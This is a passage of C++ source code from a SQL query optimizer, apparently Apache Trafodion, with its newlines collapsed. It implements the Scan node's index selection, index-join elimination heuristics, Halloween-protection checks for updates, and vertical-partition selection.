(CmpCommon::getDefault(MTD_GENERATE_CC_PREDS) == DF_ON) { // compute predicates on computed columns from regular predicates, based // on the definition of the computed column. Example: // - regular predicate: a = 99 // - computed column definition: "_SALT_" = HASH2PARTFUNC(a,2) // - computed predicate: "_SALT_" = HASH2PARTFUNC(99,2); ValueIdSet clusteringKeyCols( getTableDesc()->getClusteringIndex()->getClusteringKeyCols()); ValueIdSet selectionPreds(preds); ScanKey::createComputedColumnPredicates( selectionPreds, clusteringKeyCols, getGroupAttr()->getCharacteristicInputs(), generatedCCPreds_); } // a shortcut for tables with no indexes if ((ixlist.entries() == 1)|| (tableDesc->isPartitionNameSpecified())) { // that's easy, there is only one index (the base table) // and that index better have everything we need IndexJoinSelectivityEnum junk; MdamFlags flag=ixlist[0]->pruneMdam(preds,TRUE,junk);; IndexProperty * ixProp = new(CmpCommon::statementHeap()) IndexProperty(ixlist[0], flag); indexOnlyIndexes_.insert(ixProp); return; } // all the value ids that are required by the scan and its parents ValueIdSet requiredValueIds(getGroupAttr()->getCharacteristicOutputs()); // VEGPreds can have two forms, an A IS NOT NULL form and an A=B form // when expanded in the generator. If an index does not provide a // VEG member that the base table provides, a VEGPredicate could be // covered by the index in its IS NOT NULL form (checking a char. input // whether it is not null). To avoid this bug, add all the base cols // that contribute to VEGPredicates as explicitly required values. addBaseColsFromVEGPreds(requiredValueIds); // using old predicate tree: if ((CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) && (preds.entries())) { requiredValueIds += preds; } else // selection predicates are also required, add them to requiredValueIds requiredValueIds += selectionPred(); // a list of VEGReferences to the clustering key column(s) ValueIdSet clusteringKeyColumns; // some helper variables ValueIdList clusteringKeyColList; // a set of join predicates between indexes (same for all indexes) ValueIdSet indexJoinPreds; // --------------------------------------------------------------------- // find out the subset of values that are always covered // --------------------------------------------------------------------- // get the clustering key columns and transform them into VEGies CMPASSERT(tableDesc); tableDesc->getEquivVEGCols( tableDesc->getClusteringIndex()->getIndexKey(), clusteringKeyColList); clusteringKeyColumns = clusteringKeyColList; // get the VEGPredicates from the list of VEGReferences; they are // the join predicates between indexes (who all contain the clustering key) for (ValueId x = clusteringKeyColumns.init(); clusteringKeyColumns.next(x); clusteringKeyColumns.advance(x)) { // clustering key columns must be VEGReferences CMPASSERT(x.getItemExpr()->getOperatorType() == ITM_VEG_REFERENCE); if (((VEGReference *) x.getItemExpr())->getVEG()->getSpecialNulls()) ((VEGReference *) x.getItemExpr()) ->getVEG()->getVEGPredicate()->setSpecialNulls(TRUE); // find the corresponding VEGPredicate and add it to the join preds indexJoinPreds += ((VEGReference *) x.getItemExpr())-> getVEG()->getVEGPredicate()->getValueId(); } const NABoolean updatingCol = tableDesc->getColUpdated().entries() > 0; const NABoolean unlimitedIndexJoinsAllowed = ((ActiveControlDB()->getRequiredShape() AND ActiveControlDB()->getRequiredShape()->getShape() AND NOT ActiveControlDB()->getRequiredShape()->getShape()->isCutOp()) OR (getGroupAttr()->isEmbeddedUpdateOrDelete()) OR (getGroupAttr()->isStream()) ); const TableAnalysis * tAnalysis = getTableDesc()->getTableAnalysis(); // with this CQD value set, try to consider minimum indexes possible // if ixProp is no better than any of indexOnlyIndexes_ - don't add // it. If ixProp is better than some of this set - remove them. NABoolean tryToEliminateIndex = CURRSTMT_OPTDEFAULTS->indexEliminationLevel() == OptDefaults::AGGRESSIVE AND NOT unlimitedIndexJoinsAllowed AND tAnalysis; CostScalar indexEliminationThreshold = ActiveSchemaDB()->getDefaults().getAsLong(INDEX_ELIMINATION_THRESHOLD); NABoolean printIndexElimination = CmpCommon::getDefault(NSK_DBG_PRINT_INDEX_ELIMINATION) == DF_ON && CmpCommon::getDefault(NSK_DBG) == DF_ON; ostream &out = CURRCONTEXT_OPTDEBUG->stream(); if ( printIndexElimination ) { out << endl << "call addIndexInfo()" << endl; out << "tryToEliminateIndex=" << (Lng32)tryToEliminateIndex << endl; } // --------------------------------------------------------------------- // For each index, check whether it provides any useful values // --------------------------------------------------------------------- for (CollIndex indexNo = 0; indexNo < ixlist.entries(); indexNo++) { IndexDesc *idesc = ixlist[indexNo]; NABoolean dummy; // halloweenProtection is decided using updateableIndex // in GU::normalizeNode. Here this parameter is not used. // Determine if this index can be used for a scan during an update. if (updatingCol AND NOT updateableIndex(idesc, preds, dummy)) continue; ValueIdSet indexColumns(idesc->getIndexColumns()); ValueIdSet referencedInputs; ValueIdSet coveredSubexpr; ValueIdSet unCoveredExpr; GroupAttributes indexOnlyGA; NABoolean indexOnlyScan; // make group attributes for an index scan indexOnlyGA.addCharacteristicOutputs(idesc->getIndexColumns()); indexOnlyGA.addCharacteristicOutputs(extraOutputColumns_); // does the index cover all required values, and if not, which // ones does it cover and which ones are not covered indexOnlyScan = requiredValueIds.isCovered( getGroupAttr()->getCharacteristicInputs(), indexOnlyGA, referencedInputs, coveredSubexpr, unCoveredExpr); // if this is a sample scan (currently these are only CLUSTER // sampling scans) then do not choose index only scan. Also, // due to an artifact of sampling, the 'isCovered' test above // will not return TRUE even for the ClusteringIndex, so force // it to be true for the ClusteringIndex. Note that // ClusterIndex means that this is the basetable access path. // if (isSampleScan()) { if (idesc->isClusteringIndex()) { // Force it to be TRUE for the basetable access path. // This overrides the value of 'indexOnlyScan' produced // above since for sample scans, the isCovered test will // always fail, even for the basetable. // indexOnlyScan = TRUE; } else { indexOnlyScan = FALSE; } } // if the user specified IN EXCLUSIVE MODE option for this select, // then do not choose index only scan. This is needed so the base // table row could be locked in exclusive mode. if ((indexOnlyScan) && (! idesc->isClusteringIndex()) && (accessOptions().lockMode() == EXCLUSIVE_)) indexOnlyScan = FALSE; //pruneMdam() returns a flag indicating if the index would have //has good enough key access for MDAM access to be viable. For index //join indexes it also returns a IndexJoinSelectivityEnum that //indicates if the index join is going to exceed the cost of just //scanning the base table. if (indexOnlyScan) { // this index supplies all the info we need, consider // it for an index only scan later IndexJoinSelectivityEnum junk; MdamFlags flag=idesc->pruneMdam(preds,TRUE,junk); IndexProperty * ixProp = new(CmpCommon::statementHeap()) IndexProperty(idesc, flag); if (tryToEliminateIndex) { // with this CQD value set, try to consider minimum indexes possible // if ixProp is no better than any of indexOnlyIndexes_ - don't add // it. If ixProp is better than some of this set - remove them. ixProp->updatePossibleIndexes(indexOnlyIndexes_, this); } else indexOnlyIndexes_.insert(ixProp); } else { GroupAttributes indexGA; ValueIdSet ijCoveredPredicates; if(numIndexJoins_ < MAX_NUM_INDEX_JOINS AND NOT unlimitedIndexJoinsAllowed) { //Is any of the predicates covered by key columns of the //alternate index? ValueIdList userKeyColumns(idesc->getIndexKey()); CollIndex numSecondaryIndexKey = idesc->getNAFileSet()->getCountOfColumns( TRUE, // key columns only TRUE, // user-specified key columns only FALSE, // don't exclude system columns FALSE); // don't exclude salt/divisioning columns CollIndex numClusteringKey = userKeyColumns.entries() - numSecondaryIndexKey; if(NOT idesc->isUniqueIndex()) { CollIndex entry = userKeyColumns.entries() -1; for(CollIndex i=0;i<numClusteringKey;i++) { userKeyColumns.removeAt(entry); entry--; } } indexGA.addCharacteristicOutputs(userKeyColumns); ValueIdSet ijReferencedInputs; ValueIdSet ijUnCoveredExpr; ValueId vid; ValueIdSet disjuncts; // Multi-Index OR optimization requires that the index information // is maintained for disjuncts as well. So here we check if the // predicate is of the form A OR B OR C. If it is, then the top // operator is the OR operator. The optimization is considered only // in this case. So if the predicate has an OR on top of the item // expression, then we check if the disjuncts are covered by the // index. if (preds.entries() == 1) { preds.getFirst(vid); if (vid.getItemExpr()->getOperatorType() == ITM_OR) { vid.getItemExpr()->convertToValueIdSet(disjuncts, NULL, ITM_OR, FALSE); } else disjuncts=preds; } else disjuncts=preds; disjuncts.isCovered( getGroupAttr()->getCharacteristicInputs(), indexGA, ijReferencedInputs, ijCoveredPredicates, ijUnCoveredExpr); // we only care about predicates that are entirely covered, // parts of predicates (like constants) that are covered // don't help in this context ijCoveredPredicates.intersectSet(disjuncts); } // This index does not provide all required values. // However, it might be useful to join this index with another // one (most likely the clustering index) to get the rest // of the required values. If this is promising at all, then // add this index to a list of possible index joins. // In that list of possible index joins, group all indexes // that provide the same set of output values (but different // orders) together. if (numIndexJoins_ < MAX_NUM_INDEX_JOINS AND (unlimitedIndexJoinsAllowed OR NOT ijCoveredPredicates.isEmpty())) { // changing back to old predicate tree: ValueIdSet selectionpreds; if((CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) && (selectionPred().entries())) { ValueIdList selectionPredList(selectionPred()); ItemExpr *inputItemExprTree = selectionPredList.rebuildExprTree(ITM_AND,FALSE,FALSE); ItemExpr * resultOld = revertBackToOldTree(CmpCommon::statementHeap(), inputItemExprTree); resultOld->convertToValueIdSet(selectionpreds, NULL, ITM_AND); doNotReplaceAnItemExpressionForLikePredicates(resultOld,selectionpreds,resultOld); } // For now, only consider indexes that covers one of the selection // predicates unless control query shape is in effect. // NOTE: we should also consider indexes that potentially // could provide an interesting order or partitioning. To do // that, we would have to check whether their first key column // or any of their partitioning key columns is used. // For exclusive mode, any index can be called a usable index of // of another, only if it produces the same characteristic // outputs as the main index, and also both indexes have the same // uncovered expressions. This is because, in exclusive mode the // base (clustering key) index must always be read even if the // alternate index is index only, because the locks on the // base index are required for exclusive mode. // We can test the index only case with exclusive mode by // requiring the uncovered expressions to be the same // (both would be NULL for index only). // we now have the following information ready: // - coveredSubexpr are the values that the index can deliver // (+ clustering key columns) // - unCoveredExpr are the values that the right child of the // index join should deliver (+ clustering key values) // - we know the clustering key VEGies, whose VEGPredicates // serve as join predicates between the indexes // - we can find out the selection predicates covered // by the index by intersecting them with coveredSubexpr ValueIdSet newOutputsFromIndex(coveredSubexpr); ValueIdSet newIndexPredicates(coveredSubexpr); ValueIdSet newOutputsFromRightScan(unCoveredExpr); newOutputsFromIndex += clusteringKeyColumns; if(CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) { newOutputsFromIndex -= selectionpreds; } else newOutputsFromIndex -= selectionPred(); newOutputsFromIndex -= getGroupAttr()-> getCharacteristicInputs(); if(CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) { newIndexPredicates.intersectSet(selectionpreds); newOutputsFromRightScan -= selectionpreds; } else { newIndexPredicates.intersectSet(selectionPred()); newOutputsFromRightScan -= selectionPred(); } newOutputsFromRightScan += clusteringKeyColumns; NABoolean idescAbsorbed = FALSE; // does another index have the same covered values? for (CollIndex i = 0; i < possibleIndexJoins_.entries(); i++) { NABoolean isASupersetIndex = possibleIndexJoins_[i]->outputsFromIndex_.contains(newOutputsFromIndex); NABoolean isASubsetIndex = newOutputsFromIndex.contains(possibleIndexJoins_[i]->outputsFromIndex_) ; NABoolean isASuperOrSubsetIndex = isASupersetIndex || isASubsetIndex; NABoolean produceSameIndexOutputs = isASupersetIndex && isASubsetIndex; if ((possibleIndexJoins_[i]->inputsToIndex_ == referencedInputs) && ((accessOptions().lockMode() != EXCLUSIVE_) || possibleIndexJoins_[i]->outputsFromRightScan_ == newOutputsFromRightScan)) { ScanIndexInfo *ixi = possibleIndexJoins_[i]; IndexJoinSelectivityEnum isGoodIndexJoin = INDEX_JOIN_VIABLE; MdamFlags mdamFlag = idesc->pruneMdam(ixi->indexPredicates_,FALSE, isGoodIndexJoin, getGroupAttr(),&(ixi->inputsToIndex_)); IndexProperty * ixProp; if(getGroupAttr()->getInputLogPropList().entries() >0) ixProp = new(CmpCommon::statementHeap()) IndexProperty(idesc, mdamFlag, isGoodIndexJoin, (getGroupAttr()->getInputLogPropList())[0]); else ixProp = new(CmpCommon::statementHeap()) IndexProperty(idesc, mdamFlag, isGoodIndexJoin); if ( !tryToEliminateIndex || idesc->indexHintPriorityDelta() > 0) { if ( produceSameIndexOutputs && ixi->indexPredicates_ == newIndexPredicates ) { ixi->usableIndexes_.insert(ixProp); idescAbsorbed = TRUE; break; } } else { CANodeId tableId = tAnalysis->getNodeAnalysis()->getId(); // keep the index that provides the maximal coverage of the // predicate. Do this only when the output from one index is // the super set of the other. For example (a,b) in I1 // (CREATE INDEX T1 on T(a, b)) is a superset of (a) in I2 // (CREATE INDEX T2 on T(a)). if ( isASuperOrSubsetIndex && !produceSameIndexOutputs ) { // Score the index's coverage by computing the remaining length of the // key columns not covering the index predicates. The one with remaining // length of 0 is the best. ValueIdSet indexCols; newIndexPredicates.findAllReferencedIndexCols(indexCols); Lng32 currentPrefixLen = idesc->getIndexKey().findPrefixLength(indexCols); Lng32 currentSuffixLen = idesc->getIndexKey().entries() - currentPrefixLen; Lng32 previousPrefixLen = ixi->usableIndexes_[0]->getIndexDesc() ->getIndexKey().findPrefixLength(indexCols); Lng32 previousSuffixLen = ixi->usableIndexes_[0]->getIndexDesc() ->getIndexKey().entries() - previousPrefixLen; if ( currentSuffixLen < previousSuffixLen ) { if ( printIndexElimination ) out << "Eliminate index join heuristics 1: remove " << ixi->usableIndexes_[0]->getIndexDesc()->getExtIndexName().data() << endl; ixi = new (CmpCommon::statementHeap()) ScanIndexInfo(referencedInputs, newOutputsFromIndex, newIndexPredicates, indexJoinPreds, newOutputsFromRightScan, idesc->getIndexKey(), ixProp); possibleIndexJoins_[i] = ixi; } else { // do nothing. The current index is less useful. if ( printIndexElimination ) out << "Eliminate index join heuristics 1: remove " << idesc->getExtIndexName().data() << endl; } idescAbsorbed = TRUE; } else // if no index is a prefix of the other and the two do not produce // same output, pick one with high selectivity. if ( !isASuperOrSubsetIndex && !produceSameIndexOutputs ) { // two indexes do not produce the same outputs. Select // one with the most selectivity. CostScalar rowsToScan; CostScalar currentDataAccess = computeCpuResourceForIndexJoin(tableId, idesc, newIndexPredicates, rowsToScan); if ( rowsToScan > indexEliminationThreshold ) break; CostScalar previousDataAccess = computeCpuResourceForIndexJoin(tableId, ixi->usableIndexes_[0]->getIndexDesc(), ixi->indexPredicates_, rowsToScan); if ( currentDataAccess < previousDataAccess ) { if ( printIndexElimination ) out << "Eliminate index join heuristics 2: remove " << ixi->usableIndexes_[0]->getIndexDesc()->getExtIndexName().data() << endl; ixi = new (CmpCommon::statementHeap()) ScanIndexInfo(referencedInputs, newOutputsFromIndex, newIndexPredicates, indexJoinPreds, newOutputsFromRightScan, idesc->getIndexKey(), ixProp); possibleIndexJoins_[i] = ixi; } else { // do nothing. The current index is less useful. if ( printIndexElimination ) out << "Eliminate index join heuristics 2: remove " << idesc->getExtIndexName().data() << endl; } idescAbsorbed = TRUE; } else { // must be produceSameIndexOutputs when reach here. CMPASSERT(produceSameIndexOutputs); // Another index produces the same characteristic // outputs. Combine the two indexes in a single // scan. Add this index to the list of indexes, // everything else should be set already if ( possibleIndexJoins_[i]->indexPredicates_ == newIndexPredicates && ixProp->compareIndexPromise(ixi->usableIndexes_[0]) == MORE ) { if ( printIndexElimination ) out << "Eliminate index join heuristics 0: remove " << ixi->usableIndexes_[0]->getIndexDesc()->getExtIndexName().data() << endl; ixi = new (CmpCommon::statementHeap()) ScanIndexInfo(referencedInputs, newOutputsFromIndex, newIndexPredicates, indexJoinPreds, newOutputsFromRightScan, idesc->getIndexKey(), ixProp); possibleIndexJoins_[i] = ixi; idescAbsorbed = TRUE; } } break; } // try to eliminate this index from consideration } // found another index join with the same covered values } // for loop: does another index join have the same covered values? if (!idescAbsorbed) { // create a new index info struct and add this into the // possible index joins list IndexJoinSelectivityEnum isGoodIndexJoin = INDEX_JOIN_VIABLE; MdamFlags mdamFlag = idesc->pruneMdam(newIndexPredicates,FALSE, isGoodIndexJoin, getGroupAttr(),&referencedInputs); IndexProperty * ixProp = (getGroupAttr()->getInputLogPropList().entries() >0) ? new(CmpCommon::statementHeap()) IndexProperty(idesc, mdamFlag, isGoodIndexJoin, (getGroupAttr()->getInputLogPropList())[0]) : new(CmpCommon::statementHeap()) IndexProperty(idesc, mdamFlag, isGoodIndexJoin); ScanIndexInfo *ixi = new (CmpCommon::statementHeap()) ScanIndexInfo(referencedInputs, newOutputsFromIndex, newIndexPredicates, indexJoinPreds, newOutputsFromRightScan, idesc->getIndexKey(), ixProp); possibleIndexJoins_.insert(ixi); } // !idescAbsorbed } // index delivers new values } // not indexOnly access } // for each index if ( printIndexElimination ) { out << "# of index join scans=" << possibleIndexJoins_.entries() << endl; out << "# of index only scans=" << indexOnlyIndexes_.entries() << endl; out << "==================" << endl; } CMPASSERT(indexOnlyIndexes_.entries() > 0); } // Scan::addIndexInfo void Scan::setTableAttributes(CANodeId nodeId) { NodeAnalysis * nodeAnalysis = nodeId.getNodeAnalysis(); if (nodeAnalysis == NULL) return; TableAnalysis * tableAnalysis = nodeAnalysis->getTableAnalysis(); if (tableAnalysis == NULL) return; TableDesc * tableDesc = tableAnalysis->getTableDesc(); const CorrName& name = tableDesc->getNATable()->getTableName(); setTableName((CorrName &)name); setTableDesc(tableDesc); setBaseCardinality(MIN_ONE (tableDesc->getNATable()->getEstRowCount())) ; } NABoolean Scan::updateableIndex(IndexDesc *idx, ValueIdSet& preds, NABoolean & needsHalloweenProtection) { // // Returns TRUE if the index (idx) can be used for a scan during an UPDATE. // Returns TRUE with needsHalloweenProtection also set to TRUE, if the index // needs a blocking sort for Halloween protection // Otherwise, returns FALSE to prevent use of this index. // Using the index in this case requires Halloween protection, but is likely // inefficient since there are no useful preds on the index key columns, so // we don't add this index to list of candidates. // // The conditions of when this index returns TRUE can also be expressed as // returns true for an index if it is // a) a unique/clustering index or // b) has a unique predicate on its key or // c) has an equals or range predicate on all the index columns that // get updated. If one of the key columns being updated has a range predicate // then needsHalloweenProtection is set to TRUE. // Note that if a key column is being updated and has no predicate on it then // we return FALSE. // preds has predicate in non-RangeSpec form, // while pred will be in RangeSpec form if feature is enabled. ValueIdSet pred = getSelectionPredicates(), dummySet; SearchKey searchKey(idx->getIndexKey(), idx->getOrderOfKeyValues(), getGroupAttr()->getCharacteristicInputs(), TRUE, pred, dummySet, // needed by the interface but not used here idx ); // Unique index is OK to use. if (searchKey.isUnique()) return TRUE; const ValueIdList colUpdated = getTableDesc()->getColUpdated(); const ValueIdList indexKey = idx->getIndexKey(); // Determine if the columns being updated are key columns. Each key // column being updated must have an associated equality clause in // the WHERE clause of the UPDATE for it to be used. for (CollIndex i = 0; i < colUpdated.entries(); i++) { ItemExpr *updateCol = colUpdated[i].getItemExpr(); CMPASSERT(updateCol->getOperatorType() == ITM_BASECOLUMN); for (CollIndex j = 0; j < indexKey.entries(); j++) { ItemExpr *keyCol = indexKey[j].getItemExpr(); ItemExpr *baseCol = ((IndexColumn*)keyCol)->getDefinition().getItemExpr(); CMPASSERT(baseCol->getOperatorType() == ITM_BASECOLUMN); if (getGroupAttr()->isEmbeddedUpdate()){ if (((BaseColumn*)updateCol)->getColNumber() == ((BaseColumn*)baseCol)->getColNumber()) return FALSE; } if ((NOT(idx->isUniqueIndex() || idx->isClusteringIndex()) && (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY) != DF_AGGRESSIVE)) || (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY) == DF_OFF)) { if (((BaseColumn*)updateCol)->getColNumber() == ((BaseColumn*)baseCol)->getColNumber()) { if (preds.containsAsEquiLocalPred(baseCol->getValueId())) continue; else if (preds.containsAsRangeLocalPred(baseCol->getValueId())) needsHalloweenProtection = TRUE; else { needsHalloweenProtection = FALSE; return FALSE; } } // index key col is being updated } // not a clustering or unique index } // loop over index key cols } // loop over cols being updated return TRUE; } // Scan::updateableIndex NABoolean Scan::requiresHalloweenForUpdateUsingIndexScan() { // Returns TRUE if any index that is in the list of indexes that will be // added later in addIndexInfo() to drive the scan for an UPDATE requires // Halloween protection. This is decided by using Scan::updateableIndex(). // If this method returns TRUE we will use a sort node to prevent the // "Halloween Update Problem". // preds are in RangeSpec form ValueIdSet preds = getSelectionPredicates(); const ValueIdList & colUpdated = getTableDesc()->getColUpdated(); const LIST(IndexDesc *) & ixlist = getTableDesc()->getIndexes(); if ((colUpdated.entries() == 0) || (preds.entries() == 0) || (ixlist.entries() == 1) || // this is the clustering index (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY) == DF_AGGRESSIVE)) // this setting means no Halloween protection return FALSE; if (CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON) { ValueIdList selectionPredList(preds); ItemExpr *inputItemExprTree = selectionPredList.rebuildExprTree(ITM_AND,FALSE,FALSE); ItemExpr * resultOld = revertBackToOldTree(STMTHEAP, inputItemExprTree); preds.clear(); resultOld->convertToValueIdSet(preds, NULL, ITM_AND); doNotReplaceAnItemExpressionForLikePredicates(resultOld,preds, resultOld); } NABoolean needsHalloweenProtection ; for (CollIndex indexNo = 0; indexNo < ixlist.entries(); indexNo++) { IndexDesc *idx = ixlist[indexNo]; if (idx->isClusteringIndex() || (idx->isUniqueIndex() && (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY) == DF_ON))) continue ; // skip this idesc needsHalloweenProtection = FALSE; if(updateableIndex(idx, preds, needsHalloweenProtection) && needsHalloweenProtection) return TRUE; // if even one index requires Halloween, then we add the sort } return FALSE; } // how many index descriptors can be used with this scan node? CollIndex Scan::numUsableIndexes() { // start with the index-only indexes CollIndex result = indexOnlyIndexes_.entries(); // for each index join, count all the indexes that result in equivalent // characteristics inputs and outputs for (CollIndex i=0; i < possibleIndexJoins_.entries(); i++) result += possibleIndexJoins_[i]->usableIndexes_.entries(); return result; } // this method works like an operator[], with values for indexNum // between 0 and numUsableIndexes()-1. It returns the associated IndexDesc // and - depending on whether it is an index-only scan or an index join - // the appropriate information class (optional). IndexDesc * Scan::getUsableIndex(CollIndex indexNum, IndexProperty **indexOnlyInfo, ScanIndexInfo **indexJoinInfo) { IndexDesc *result = NULL; IndexProperty *locIndexOnlyInfo = NULL; ScanIndexInfo *locIndexJoinInfo = NULL; if (indexNum < indexOnlyIndexes_.entries()) { // indexNum corresponds to an index-only scan locIndexOnlyInfo = indexOnlyIndexes_[indexNum]; result = locIndexOnlyInfo->getIndexDesc(); } else { // search for index desc "indexNum" in the index joins // (which is a list of sets of index descs, making this // method somewhat complex) indexNum -= indexOnlyIndexes_.entries(); CollIndex ixJoinIx = 0; CollIndex numIndexJoins = possibleIndexJoins_.entries(); if (numIndexJoins > 0) { // loop over the list of index joins, counting index descs until // we find the right index join while (ixJoinIx < numIndexJoins) { ScanIndexInfo *si = possibleIndexJoins_[ixJoinIx]; if (indexNum >= si->usableIndexes_.entries()) { // not there yet, go on to the next index join indexNum -= si->usableIndexes_.entries(); ixJoinIx++; } else { // now we have reached the right index join (if // any), select an index locIndexJoinInfo = si; result = si->usableIndexes_[indexNum]->getIndexDesc(); break; } } } } // return information or NULL for not found if (indexOnlyInfo) *indexOnlyInfo = locIndexOnlyInfo; if (indexJoinInfo) *indexJoinInfo = locIndexJoinInfo; return result; } void Scan::getRequiredVerticalPartitions (SET(IndexDesc *) & requiredVPs, SET(ValueIdSet *) & columnsProvidedByVP) const { // We get requiredVPs and columnsProvidedByVP passed to us that have // no entries. We have to populate them with the vertical partitions // required to service the query and the columns that each of those // VPs will provide. Each entry in columnsProvidedByVP is related to // the corresponding entry in requiredVPs CMPASSERT(requiredVPs.entries() == 0 && columnsProvidedByVP.entries() == 0); const TableDesc * tableDesc = getTableDesc(); const LIST(IndexDesc *) & allVPs = tableDesc->getVerticalPartitions(); #ifdef OLD // Get all the value ids that are required by the scan and its parents ValueIdSet requiredValueIds(getGroupAttr()->getCharacteristicOutputs()); // VEGPreds can have two forms, an A IS NOT NULL form and an A=B form // when expanded in the generator. If an index does not provide a // VEG member that the base table provides, a VEGPredicate could be // covered by the index in its IS NOT NULL form (checking a char. input // whether it is not null). To avoid this bug, add all the base cols // that contribute to VEGPredicates as explicitly required values. addBaseColsFromVEGPreds(requiredValueIds); // selection predicates are also required, add them to requiredValueIds requiredValueIds += getSelectionPred(); // Remove any VEGPreds from required Values ValueIdSet VEGEqPreds; getSelectionPred().lookForVEGPredicates(VEGEqPreds); requiredValueIds -= VEGEqPreds; // The following code gets all the leaf node value ids. It deletes the // characteristic input list of value ids from the leaf value ids. It // does this since predicates are not pushed down to the VPs and the VPs // only provide outputs and do not take any inputs. It reassigns the // remaining leaf value ids as those actually required from the VPs. // This code e.g. will only keep the b from a predicate such as b > 3 // and the c from an expression c + 1 in the select list. ValueIdSet leafValues, emptySet; GroupAttributes emptyGA; requiredValueIds.getLeafValuesForCoverTest(leafValues, emptyGA, emptySet); leafValues -= getGroupAttr()->getCharacteristicInputs(); requiredValueIds = leafValues; #endif // ----------------------------------------------------------------- // Accumulate the ValueIds of all VEGPredicates. // ----------------------------------------------------------------- ValueIdSet VEGEqPreds; getSelectionPred().lookForVEGPredicates(VEGEqPreds); // ----------------------------------------------------------------- // Compute the set of expressions that will be evaluated on the // parent. Add a VEGReference for every VEGPredicate in this set. // ----------------------------------------------------------------- // remaining expressions on parent ValueIdSet requiredValueIdsMembers; RelExpr::computeValuesReqdForPredicates(VEGEqPreds, requiredValueIdsMembers); ValueIdSet requiredValueIds; requiredValueIds.replaceVEGExpressionsAndCopy(requiredValueIdsMembers); // --------------------------------------------------------------------- // Examine the set of values required by the parent (VPJoin node). // Replace each VEGPredicate with a VEGReferences for its VEG; if its // VEG contains other VEGReferences, add them to requiredValueIds. // --------------------------------------------------------------------- RelExpr::computeValuesReqdForPredicates(getGroupAttr()->getCharacteristicOutputs(), requiredValueIds); requiredValueIds += getSelectionPred(); requiredValueIds -= VEGEqPreds; // delete all VEGPredicates // The following code gets all the leaf node value ids. It deletes the // characteristic input list of value ids from the leaf value ids. It // does this since predicates are not pushed down to the VPs and the VPs // only provide outputs and do not take any inputs. It reassigns the // remaining leaf value ids as those actually required from the VPs. // This code e.g. will only keep the b from a predicate such as b > 3 // and the c from an expression c + 1 in the select list. ValueIdSet leafValues, emptySet; GroupAttributes emptyGA; requiredValueIds.getLeafValuesForCoverTest(leafValues, emptyGA, emptySet); leafValues -= getGroupAttr()->getCharacteristicInputs(); requiredValueIds = leafValues; // Remove all basecolumns (logical columns) // for(ValueId expr = requiredValueIds.init(); requiredValueIds.next(expr); requiredValueIds.advance(expr)) { ItemExpr *ie = expr.getItemExpr(); if(ie->getOperatorType() == ITM_BASECOLUMN) requiredValueIds -= expr; } // the values that are covered by every vertical partition (such as // clustering key) ValueIdSet alwaysCovered; // a list of VEGReferences to the clustering key column(s) ValueIdSet clusteringKeyColumns; // some helper variables ValueIdList clusteringKeyColList; GroupAttributes alwaysCoveredGA; ValueIdSet dummyReferencedInputs; ValueIdSet dummyUnCoveredExpr; // --------------------------------------------------------------------- // find out the subset of values that are always covered // --------------------------------------------------------------------- // get the clustering key columns and transform them into VEGies tableDesc->getEquivVEGCols(tableDesc->getClusteringIndex()->getIndexKey(), clusteringKeyColList); clusteringKeyColumns = clusteringKeyColList; // make group attributes that get the original scan node's char. // inputs and the clustering key columns as outputs (every VP // should have the clustering key), to represent the least common // denominator of all VP attributes alwaysCoveredGA.addCharacteristicOutputs(clusteringKeyColumns); requiredValueIds.isCovered( getGroupAttr()->getCharacteristicInputs(), alwaysCoveredGA, dummyReferencedInputs, alwaysCovered, dummyUnCoveredExpr); // alwaysCovered now contains a set of values that should be covered // by every vertical partition ValueIdSet remainingValueIds = requiredValueIds; // --------------------------------------------------------------------- // For each vertical partition, check whether it provides any useful // values // --------------------------------------------------------------------- for (CollIndex indexNo = 0; indexNo < allVPs.entries(); indexNo++) { IndexDesc *idesc = allVPs[indexNo]; ValueIdSet indexColumns(idesc->getIndexColumns()); ValueIdSet *coveredSubexpr = new (CmpCommon::statementHeap()) ValueIdSet(); ValueIdSet noCharacteristicInputs; GroupAttributes vpGroupAttributes; NABoolean onlyOneVPRequired; // make group attributes for a vertical partition scan vpGroupAttributes.addCharacteristicOutputs(idesc->getIndexColumns()); // does the index cover all required values, and if not, which // ones does it cover onlyOneVPRequired = requiredValueIds.isCovered(noCharacteristicInputs, vpGroupAttributes, dummyReferencedInputs, *coveredSubexpr, dummyUnCoveredExpr); if (onlyOneVPRequired) { // This vertical partition supplies all the required values. // That means we have all the required vertical partitions // and we are done. In fact, if we had selected other VPs // before we need to clear them out along with the columns // they provide. // There should not be any selection predicates in this list // since they should have been eliminated from // requiredValueIdsby the leaf value id code earlier. requiredVPs.clear(); columnsProvidedByVP.clear(); requiredVPs.insert(idesc); columnsProvidedByVP.insert(coveredSubexpr); return; } else { if(remainingValueIds.entries() > 0) { coveredSubexpr->clear(); requiredValueIds.isCovered(noCharacteristicInputs, vpGroupAttributes, dummyReferencedInputs, *coveredSubexpr, dummyUnCoveredExpr); // This vertical partition does not provide all required values. // Normally we wouldn't expect it to. But does it provide a // column value other than the clustering key? If it does, it's in! // We should take out the selection predicates since we will // not be evaluating any predicates in the VP scan. if ( (*coveredSubexpr != alwaysCovered) && ((*coveredSubexpr).entries() > 0) ) { requiredVPs.insert(idesc); *coveredSubexpr -= getSelectionPred(); columnsProvidedByVP.insert(coveredSubexpr); } // VP delivers column values remainingValueIds -= *coveredSubexpr; } } // not onlyOneVPRequired } // for each VP return; } // Scan::getRequiredVerticalPartitions void Scan::addBaseColsFromVEGPreds(ValueIdSet &vs) const { // get all the base columns of the table (no VEGies) ValueIdSet baseCols(tabId_->getColumnList()); for (ValueId x = getSelectionPred().init(); getSelectionPred().next(x); getSelectionPred().advance(x)) { ItemExpr *ie = x.getItemExpr(); if (ie->getOperatorType() == ITM_VEG_PREDICATE) { // get the VEG members ValueIdSet vegMembers( ((VEGPredicate *)ie)->getVEG()->getAllValues()); // filter out the base columns of this table that are VEG members // and add them to the output parameter vegMembers.intersectSet(baseCols); vs += vegMembers; } } } void Scan::addLocalExpr(LIST(ExprNode *) 